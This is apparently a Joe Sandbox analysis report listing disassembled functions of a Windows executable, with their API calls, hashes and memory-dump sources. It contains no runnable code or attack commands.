                                                                  • Instruction ID: 81b0d67795d1c46eed8b9e39a82a37e505cf595650fdccdd712ce4c6efceecb3
                                                                  • Opcode Fuzzy Hash: 03c8ad4d04c3024dcd07658331099b89ba576fbee1aa4e656d01a2db26b2fe0d
                                                                  • Instruction Fuzzy Hash: B651E570A00649DFCB10CFA8D895BEEBBFAFF09311F14415AE956E7291E7309A45CB60
                                                                  Function 00643090 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • _ValidateLocalCookies.LIBCMT ref: 006430BB
                                                                  • ___except_validate_context_record.LIBVCRUNTIME ref: 006430C3
                                                                  • _ValidateLocalCookies.LIBCMT ref: 00643151
                                                                  • __IsNonwritableInCurrentImage.LIBCMT ref: 0064317C
                                                                  • _ValidateLocalCookies.LIBCMT ref: 006431D1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                  • String ID: csm
                                                                  • API String ID: 1170836740-1018135373
                                                                  • Opcode ID: f5041915d76bfffe77240e2d679567a5078c8e96917c79ac75c727ef21dea9f2
                                                                  • Instruction ID: c1d4f2d55b12dd95909f7757a2facd2c6cd9df73139a0d1781890d3f2bbdd8bb
                                                                  • Opcode Fuzzy Hash: f5041915d76bfffe77240e2d679567a5078c8e96917c79ac75c727ef21dea9f2
                                                                  • Instruction Fuzzy Hash: 7441A534E00229ABCF10DF68C885AEEBBB7AF45324F148159E915AB392D731DB05CB91
                                                                  Function 0068D7AB Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0068D7CD,?), ref: 0068E714
                                                                    • Part of subcall function 0068E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0068D7CD,?), ref: 0068E72D
                                                                  • lstrcmpiW.KERNEL32(?,?), ref: 0068D7F0
                                                                  • MoveFileW.KERNEL32(?,?), ref: 0068D82A
                                                                  • _wcslen.LIBCMT ref: 0068D8B0
                                                                  • _wcslen.LIBCMT ref: 0068D8C6
                                                                  • SHFileOperationW.SHELL32(?), ref: 0068D90C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileFullNamePath_wcslen$MoveOperationlstrcmpi
                                                                  • String ID: \*.*
                                                                  • API String ID: 3164238972-1173974218
                                                                  • Opcode ID: 9b4cd398ae545e4e4c46cedb5b62315a24afd0d7828b3e702fc88df744e3e5ea
                                                                  • Instruction ID: d3733cfb21c853a4b7bb52121ec10503fa1ef54034e9ae4b77f07a7dd8b0c691
                                                                  • Opcode Fuzzy Hash: 9b4cd398ae545e4e4c46cedb5b62315a24afd0d7828b3e702fc88df744e3e5ea
                                                                  • Instruction Fuzzy Hash: FE4187B1D452189EDF56FFA4D981BDE73BAAF08340F0001EAE505EB181EB35A788CB54
                                                                  Function 006942B9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetInputState.USER32 ref: 00694310
                                                                  • TranslateAcceleratorW.USER32(?,00000000,?), ref: 00694367
                                                                  • TranslateMessage.USER32(?), ref: 00694390
                                                                  • DispatchMessageW.USER32(?), ref: 0069439A
                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006943AB
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Message$Translate$AcceleratorDispatchInputPeekState
                                                                  • String ID: (o
                                                                  • API String ID: 2256411358-1684096767
                                                                  • Opcode ID: 2f5145a6eb76c2ef6ee26c5b8863250f6d2e7eb6ec14553095a92a733b1a61dc
                                                                  • Instruction ID: 15da857314a68075110a07c3a362788b5af10d2af0edf4032137331261e99c68
                                                                  • Opcode Fuzzy Hash: 2f5145a6eb76c2ef6ee26c5b8863250f6d2e7eb6ec14553095a92a733b1a61dc
                                                                  • Instruction Fuzzy Hash: 3E31A470504346DEEF34CB76D859FF63BAEEB11308F041569D46286AA0EBA49887CF61
                                                                  Function 006B3899 Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 006B38B8
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B38EB
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B3920
                                                                  • SendMessageW.USER32(?,000000F1,00000000,00000000), ref: 006B3952
                                                                  • SendMessageW.USER32(?,000000F1,00000001,00000000), ref: 006B397C
                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 006B398D
                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 006B39A7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow$MessageSend
                                                                  • String ID:
                                                                  • API String ID: 2178440468-0
                                                                  • Opcode ID: d27e79366e9b299af504fb1aff53cc16b4b10e1ffcbb10d772eed0583913ec21
                                                                  • Instruction ID: c1a7ee22867a2d96f09409e642c1ad4d17cd297dcf2cbf5546b7a73ebda018fa
                                                                  • Opcode Fuzzy Hash: d27e79366e9b299af504fb1aff53cc16b4b10e1ffcbb10d772eed0583913ec21
                                                                  • Instruction Fuzzy Hash: A93125B4704265AFDB219F49DC95FA437E2EB86710F1512A4F5048B3B2DBB0A984CF01
                                                                  Function 0068808D Relevance: 10.6, APIs: 7, Instructions: 94memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006880D0
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006880F6
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 006880F9
                                                                  • SysAllocString.OLEAUT32(?), ref: 00688117
                                                                  • SysFreeString.OLEAUT32(?), ref: 00688120
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00688145
                                                                  • SysAllocString.OLEAUT32(?), ref: 00688153
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: 11ef9a1ec9467a9d262a8b6d3a9f17d180aa8abe386375128f11127c9c72a243
                                                                  • Instruction ID: ac27578d9dedc403408642b0b6ac463a55161e3c4c60b9e110250f6ff46a0589
                                                                  • Opcode Fuzzy Hash: 11ef9a1ec9467a9d262a8b6d3a9f17d180aa8abe386375128f11127c9c72a243
                                                                  • Instruction Fuzzy Hash: D221977260021AAF9F10EFA8CC88CBE73EEEB093607448625F905DB290DE70DC468764
                                                                  Function 00688164 Relevance: 10.6, APIs: 7, Instructions: 89memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006881A9
                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006881CF
                                                                  • SysAllocString.OLEAUT32(00000000), ref: 006881D2
                                                                  • SysAllocString.OLEAUT32 ref: 006881F3
                                                                  • SysFreeString.OLEAUT32 ref: 006881FC
                                                                  • StringFromGUID2.OLE32(?,?,00000028), ref: 00688216
                                                                  • SysAllocString.OLEAUT32(?), ref: 00688224
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                  • String ID:
                                                                  • API String ID: 3761583154-0
                                                                  • Opcode ID: fb58fb1db444ab45da43c36a19ce0fd7f5bc5a0d73f8a1254d5d8b868f900c43
                                                                  • Instruction ID: b67bebc78c150bf437752a36d7c592e61563df88833870afd2d136e0085584bd
                                                                  • Opcode Fuzzy Hash: fb58fb1db444ab45da43c36a19ce0fd7f5bc5a0d73f8a1254d5d8b868f900c43
                                                                  • Instruction Fuzzy Hash: 52218671600115BFDB10EFA8DC89DAA77EDEB093607448225F905CB2A0EF74ED81CB64
                                                                  Function 00690E79 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(0000000C), ref: 00690E99
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00690ED5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandlePipe
                                                                  • String ID: nul
                                                                  • API String ID: 1424370930-2873401336
                                                                  • Opcode ID: a7f9fd74f4be39d552a85ee285725724888e9a4144606e1291eb6591bc5b7725
                                                                  • Instruction ID: 16f39641fea2c16e063eed160fcb7dffc7af1df6de55716c9adc6c991f8018c3
                                                                  • Opcode Fuzzy Hash: a7f9fd74f4be39d552a85ee285725724888e9a4144606e1291eb6591bc5b7725
                                                                  • Instruction Fuzzy Hash: 1D21627150030AAFEF208F29DD08A9A77AEBF54760F204A59FDA5D76D0E7709A41CB50
                                                                  Function 00690F4E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80pipeCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStdHandle.KERNEL32(000000F6), ref: 00690F6D
                                                                  • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00690FA8
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHandlePipe
                                                                  • String ID: nul
                                                                  • API String ID: 1424370930-2873401336
                                                                  • Opcode ID: 0c6a0744c9ffec5a896b13bbbd080da5a5a8d378eae64b3fd83b9bdd0ff75fd7
                                                                  • Instruction ID: ce3a480cea82f8e9d3b62a18b42f7472781aa277c7f2c72f21c5cecd6e33ed69
                                                                  • Opcode Fuzzy Hash: 0c6a0744c9ffec5a896b13bbbd080da5a5a8d378eae64b3fd83b9bdd0ff75fd7
                                                                  • Instruction Fuzzy Hash: E5217F715003469FEF208F688C04A9A77AEBF56724F300B19FDA1EB6D0EB719981DB50
                                                                  Function 006B4B4B Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00627873: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006278B1
                                                                    • Part of subcall function 00627873: GetStockObject.GDI32(00000011), ref: 006278C5
                                                                    • Part of subcall function 00627873: SendMessageW.USER32(00000000,00000030,00000000), ref: 006278CF
                                                                  • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 006B4BB0
                                                                  • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 006B4BBD
                                                                  • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 006B4BC8
                                                                  • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 006B4BD7
                                                                  • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 006B4BE3
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$CreateObjectStockWindow
                                                                  • String ID: Msctls_Progress32
                                                                  • API String ID: 1025951953-3636473452
                                                                  • Opcode ID: ec34bbbb3d5fa75433c9e237b6a9a3268e927bec965aaeae405c66c24b4fd7cd
                                                                  • Instruction ID: 5dd4c93e21c808107bd4c9b6f72af623072dbec472e6fe3ae9e30c30de226c8f
                                                                  • Opcode Fuzzy Hash: ec34bbbb3d5fa75433c9e237b6a9a3268e927bec965aaeae405c66c24b4fd7cd
                                                                  • Instruction Fuzzy Hash: 6211B6B114021EBEEF118FA5CC85EE77F5EEF08798F014110B718A6051CA72DC61DBA4
                                                                  Function 00686078 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _memcmp
                                                                  • String ID: j`h
                                                                  • API String ID: 2931989736-2627015977
                                                                  • Opcode ID: 413f041d2db7fdd7600b365172ca651ba18f895f108aa5a9fecb4dd148f2442d
                                                                  • Instruction ID: 54b8dba5c6f79ba8fa64c4f16724a2186849209bca624d77a25a8f69669a9be2
                                                                  • Opcode Fuzzy Hash: 413f041d2db7fdd7600b365172ca651ba18f895f108aa5a9fecb4dd148f2442d
                                                                  • Instruction Fuzzy Hash: 5601B5A1640305BBA714B620DE82FBB735FDE5239CB014129FD069E342E772ED51C3A9
                                                                  Function 0068E30E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 46windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 0068E328
                                                                  • LoadStringW.USER32(00000000), ref: 0068E32F
                                                                  • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0068E345
                                                                  • LoadStringW.USER32(00000000), ref: 0068E34C
                                                                  • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0068E390
                                                                  Strings
                                                                  • %s (%d) : ==> %s: %s %s, xrefs: 0068E36D
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: HandleLoadModuleString$Message
                                                                  • String ID: %s (%d) : ==> %s: %s %s
                                                                  • API String ID: 4072794657-3128320259
                                                                  • Opcode ID: 9cc138975458f7ce28396da88c5a9c61ca9737ba82fc06b70b6a62e70ed635f3
                                                                  • Instruction ID: 81935196049ddf05fb87f8f32fb9f27f214842fc9c70730408b637121ba9773b
                                                                  • Opcode Fuzzy Hash: 9cc138975458f7ce28396da88c5a9c61ca9737ba82fc06b70b6a62e70ed635f3
                                                                  • Instruction Fuzzy Hash: F40186F6900208BFE751ABA49D89EE7776DD708300F0046A2B705EA041FA749EC44B75
                                                                  Function 00691312 Relevance: 10.5, APIs: 7, Instructions: 35synchronizationthreadCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • InterlockedExchange.KERNEL32(?,?), ref: 00691322
                                                                  • EnterCriticalSection.KERNEL32(00000000,?), ref: 00691334
                                                                  • TerminateThread.KERNEL32(00000000,000001F6), ref: 00691342
                                                                  • WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00691350
                                                                  • CloseHandle.KERNEL32(00000000), ref: 0069135F
                                                                  • InterlockedExchange.KERNEL32(?,000001F6), ref: 0069136F
                                                                  • LeaveCriticalSection.KERNEL32(00000000), ref: 00691376
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                  • String ID:
                                                                  • API String ID: 3495660284-0
                                                                  • Opcode ID: d68a3009e3c624c7c83023a5a3c579d81ea1e2f641120b911fbb8011247972d7
                                                                  • Instruction ID: 2222a2d9faf4bf0bd772677495b8ccf7a982ae029b2a6a6df25485abfc9fc7c8
                                                                  • Opcode Fuzzy Hash: d68a3009e3c624c7c83023a5a3c579d81ea1e2f641120b911fbb8011247972d7
                                                                  • Instruction Fuzzy Hash: C8F0EC72046612FBD7451B54EE49BDABB3AFF05302F502221F20199CA0977495B1CF90
                                                                  Function 006A26BD Relevance: 9.3, APIs: 6, Instructions: 298networkCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 006A281D
                                                                  • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 006A283E
                                                                  • WSAGetLastError.WSOCK32 ref: 006A284F
                                                                  • htons.WSOCK32(?,?,?,?,?), ref: 006A2938
                                                                  • inet_ntoa.WSOCK32(?), ref: 006A28E9
                                                                    • Part of subcall function 0068433E: _strlen.LIBCMT ref: 00684348
                                                                    • Part of subcall function 006A3C81: MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,00000000,?,?,?,?,0069F669), ref: 006A3C9D
                                                                  • _strlen.LIBCMT ref: 006A2992
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen$ByteCharErrorLastMultiWidehtonsinet_ntoa
                                                                  • String ID:
                                                                  • API String ID: 3203458085-0
                                                                  • Opcode ID: b872fee2e7e5e2ecadb6f5168f7664bb8492ee041f5a9b61c15b555caeaf2abb
                                                                  • Instruction ID: 8365bb49bc5cedfca6217e0da635bc08cf09592c2c554bafbbff3ee77787cd87
                                                                  • Opcode Fuzzy Hash: b872fee2e7e5e2ecadb6f5168f7664bb8492ee041f5a9b61c15b555caeaf2abb
                                                                  • Instruction Fuzzy Hash: 46B1E031644701AFD320EF28C895E6AB7A6AF85318F54854CF4564B3A2DB31EE82CF91
                                                                  Function 00650527 Relevance: 9.3, APIs: 6, Instructions: 269COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __allrem.LIBCMT ref: 0065042A
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00650446
                                                                  • __allrem.LIBCMT ref: 0065045D
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0065047B
                                                                  • __allrem.LIBCMT ref: 00650492
                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 006504B0
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                  • String ID:
                                                                  • API String ID: 1992179935-0
                                                                  • Opcode ID: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                  • Instruction ID: 5aee4c5ec4162a2cafc30417c38c4a8df34aca044aac5dae68fa97b88ea24805
                                                                  • Opcode Fuzzy Hash: f879b393e65d4db2631db90962c4ab5633f4520d067d5efed2ccc62c0ef88ee5
                                                                  • Instruction Fuzzy Hash: 3A81D672600B07DBF760AE68CC91BAA73EBAF44725F24412EF911D7781E770D9098798
                                                                  Function 00656571 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                  Download Yara Rule
                                                                  APIs
